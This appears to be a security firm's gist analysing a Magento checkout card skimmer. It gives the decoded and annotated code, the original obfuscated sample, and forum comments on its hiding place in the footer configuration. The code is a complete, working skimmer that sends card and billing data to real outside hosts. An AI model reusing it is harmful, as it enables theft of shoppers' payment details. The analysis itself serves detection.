962 stores found breached on the 4th of July - https://sansec.io
// Decoded by Sanguine Security <info@sansec.io>
// Analyst note: helper the skimmer installs on String.prototype. It converts every
// UTF-16 code unit of the string to lowercase hex, left-padded with '0' to exactly
// four characters ('A' -> '0041'), and concatenates the results. It is the second
// layer of the encoding applied by obfuscate() below; it is not used anywhere else.
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
// charCodeAt() -> hex, then keep the last four characters of '000' + hex.
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};
// Analyst note: keyless encoding applied to the harvested form record before it is
// placed in the exfiltration URL. Layers, in order: base64 -> hexEncode() (four hex
// digits per character) -> each hex character's char code shifted left by 3, written
// as a decimal number and followed by '*' -> base64 again. Because there is no key
// the output seen in access logs can be decoded by reversing the steps: base64-decode,
// split on '*', shift each number right by 3 and turn it back into a character,
// hex-decode in groups of four, base64-decode once more.
// Uses the browser built-in btoa(); the sample is browser-only.
function obfuscate(arg) {
var b64 = btoa(arg);
var b64hex = (b64.hexEncode());
var blob = '';
for (var i = 0; i < b64hex.length; i++) {
// e.g. '6' (0x36) becomes "432*"; the separator is also emitted after the last item.
blob += (b64hex[i].charCodeAt(0) << 3) + '*'
};
var blobb64 = btoa(blob);
return blobb64
}
// Analyst note (skimmer core). Called once on 'load' (see below): every element with
// class "button" gets a click handler. On each click the handler reads the checkout
// fields by their form names (payment[cc_number], payment[cc_cid], billing[...],
// shipping[country_id]); the names match the Magento 1 checkout forms discussed in
// the thread below. A field that is not on the page is skipped, because
// getElementsByName(...)[0] is undefined in that case, so the same handler can run
// harmlessly on non-checkout pages. The pipe-joined record is sent only when the
// CVV field (payment[cc_cid]) held a value.
// Exfiltration: the record is passed through obfuscate(), wrapped in the JSON object
// {Domain:'all', d:...}, base64-encoded and sent as the `v=` query parameter of two
// synchronous GET requests - one over HTTPS to a third-party host whose path looks
// like a Magento webroot (presumably a compromised store used as a drop; unverified),
// one over plain HTTP to a bare IP address. Those two URLs and the field list are the
// most useful indicators for detection and for reviewing proxy / access logs.
// `i` and `rand` are implicit globals; `rand` is computed but never used.
function addtoev() {
var allButtons = document.getElementsByClassName('button');
for (i = 0; i < allButtons.length; i++) {
allButtons[i].addEventListener('click', function() {
var ccCounter = '';
var serialPayload = '';
// Each field is optional: the guard is falsy when the NodeList is empty.
if (document.getElementsByName('payment[cc_number]')[0]) {
serialPayload += document.getElementsByName('payment[cc_number]')[0].value + '|'
};
// The CVV value doubles as the "send" flag checked at the end of the handler.
if (document.getElementsByName('payment[cc_cid]')[0]) {
ccCounter = document.getElementsByName('payment[cc_cid]')[0].value;
serialPayload += document.getElementsByName('payment[cc_cid]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_month]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_month]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_year]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_year]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_owner]')[0]) {
serialPayload += document.getElementsByName('payment[cc_owner]')[0].value + '|'
};
if (document.getElementsByName('billing[firstname]')[0]) {
serialPayload += document.getElementsByName('billing[firstname]')[0].value + '|'
};
if (document.getElementsByName('billing[lastname]')[0]) {
serialPayload += document.getElementsByName('billing[lastname]')[0].value + '|'
};
if (document.getElementsByName('billing[telephone]')[0]) {
serialPayload += document.getElementsByName('billing[telephone]')[0].value + '|'
};
// Only the first street line is taken.
if (document.getElementsByName('billing[street][]')[0]) {
serialPayload += document.getElementsByName('billing[street][]')[0].value + '|'
};
if (document.getElementsByName('billing[city]')[0]) {
serialPayload += document.getElementsByName('billing[city]')[0].value + '|'
};
if (document.getElementsByName('billing[postcode]')[0]) {
serialPayload += document.getElementsByName('billing[postcode]')[0].value + '|'
};
if (document.getElementsByName('billing[region_id]')[0]) {
serialPayload += document.getElementsByName('billing[region_id]')[0].value + '|'
};
if (document.getElementsByName('shipping[country_id]')[0]) {
serialPayload += document.getElementsByName('shipping[country_id]')[0].value + '|'
};
// Exfiltrate only when a CVV was captured.
if (ccCounter != '') {
var payloadObj = {
Domain: 'all',
d: obfuscate(serialPayload)
};
// Dead code: rand is never referenced again (and leaks as a global).
rand = Math.floor((Math.random() * 1000000) + 1);
// Drop 1: HTTPS, Magento-looking path on a third-party domain. Payload is the
// base64 of the JSON above in the `v=` query parameter.
urll = 'https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=' + btoa(JSON.stringify(payloadObj));
var req1 = new XMLHttpRequest();
// async=false: the browser blocks until the request completes; no response handling.
req1.open('GET', urll, false);
req1.send();
// Drop 2: same payload over plain HTTP to a raw IP address.
urll = 'http://89.32.251.136/counter/index.php?v=' + btoa(JSON.stringify(payloadObj));
var req2 = new XMLHttpRequest();
req2.open('GET', urll, false);
req2.send()
}
})
}
}
// Entry point: install the click hooks once the page (and its checkout form) has loaded.
window.addEventListener('load', function() {
addtoev()
})
// Original obfuscated sample as found in the store, kept byte-for-byte so it can be
// used for exact-match detection. It uses string-array obfuscation: _0xe6b4 holds
// every literal (method names, form field names, both drop URLs) and the code indexes
// into it; `sa` is the function shown as obfuscate() in the decoded listing above.
// The decoded listing is the readable equivalent; do not edit this line.
var _0xe6b4=["hexEncode","prototype","","length","charCodeAt","slice","000","*","button","getElementsByClassName","click","payment[cc_number]","getElementsByName","value","|","payment[cc_cid]","payment[cc_exp_month]","payment[cc_exp_year]","payment[cc_owner]","billing[firstname]","billing[lastname]","billing[telephone]","billing[street][]","billing[city]","billing[postcode]","billing[region_id]","shipping[country_id]","all","random","floor","https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=","stringify","GET","open","send","http://89.32.251.136/counter/index.php?v=","addEventListener","load"];String[_0xe6b4[1]][_0xe6b4[0]]= function(){var _0x3692x1,_0x3692x2;var _0x3692x3=_0xe6b4[2];for(_0x3692x2= 0;_0x3692x2< this[_0xe6b4[3]];_0x3692x2++){_0x3692x1= this[_0xe6b4[4]](_0x3692x2).toString(16);_0x3692x3+= (_0xe6b4[6]+ _0x3692x1)[_0xe6b4[5]](-4)};return _0x3692x3};function sa(_0x3692x5){var _0x3692x6=btoa(_0x3692x5);var _0x3692x7=(_0x3692x6[_0xe6b4[0]]());var _0x3692x8=_0xe6b4[2];for(var _0x3692x2=0;_0x3692x2< _0x3692x7[_0xe6b4[3]];_0x3692x2++){_0x3692x8+= (_0x3692x7[_0x3692x2][_0xe6b4[4]](0)<< 3)+ _0xe6b4[7]};var _0x3692x9=btoa(_0x3692x8);return _0x3692x9}function addtoev(){var _0x3692xb=document[_0xe6b4[9]](_0xe6b4[8]);for(i= 0;i< _0x3692xb[_0xe6b4[3]];i++){_0x3692xb[i][_0xe6b4[36]](_0xe6b4[10],function(){var _0x3692xc=_0xe6b4[2];var _0x3692xd=_0xe6b4[2];if(document[_0xe6b4[12]](_0xe6b4[11])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[11])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[15])[0]){_0x3692xc= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]];_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[16])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[16])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[17])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[17])[0][_0xe6b4[13]]+ 
_0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[18])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[18])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[19])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[19])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[20])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[20])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[21])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[21])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[22])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[22])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[23])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[23])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[24])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[24])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[25])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[25])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[26])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[26])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(_0x3692xc!= _0xe6b4[2]){var _0x3692xe={Domain:_0xe6b4[27],d:sa(_0x3692xd)};rand= Math[_0xe6b4[29]]((Math[_0xe6b4[28]]()* 1000000)+ 1);urll= _0xe6b4[30]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692xf= new XMLHttpRequest();_0x3692xf[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692xf[_0xe6b4[34]]();urll= _0xe6b4[35]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692x10= new XMLHttpRequest();_0x3692x10[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692x10[_0xe6b4[34]]()}})}}window[_0xe6b4[36]](_0xe6b4[37],function(){addtoev()})
@costicanu

costicanu commented Jul 18, 2019

Any idea how to fix this security breach on Magento?

@gwillem

gwillem commented Jul 26, 2019

@costicanu They use multiple exploits to gain access to these stores. See also https://sansec.io/labs/2019/01/29/magento-module-blacklist/

@temp8888

I resolved this. In my case the code had been inserted into the database, not into the PHP files on disk.

Table core_config_data: look for the row whose path is design/footer/absolute_footer; the script is in its value field.

or

System -> Configuration -> Design -> Footer -> Miscellaneous HTML

The attackers embed the malicious code in design/footer/absolute_footer, typically preceded by many lines of whitespace so that it is not visible when the field is opened in the admin UI.

edit:

#File: app/code/core/Mage/Page/Block/Html.php
public function getAbsoluteFooter()
{
return Mage::getStoreConfig('design/footer/absolute_footer');
}

Then I figured I didn't need this, so I commented it out. Note that this is a core file under app/code/core, so the change is lost on upgrade, and it only removes this one injection point - not the access that allowed the row to be written.

public function getAbsoluteFooter()
{
#return Mage::getStoreConfig('design/footer/absolute_footer');
}

You should also run https://www.magereport.com against the store to identify the missing patches and other security holes.

@gwillem

gwillem commented Jul 29, 2019

Mind you, you are battling the symptoms here, not the root cause. If people are able to write to your database, you have bigger problems.
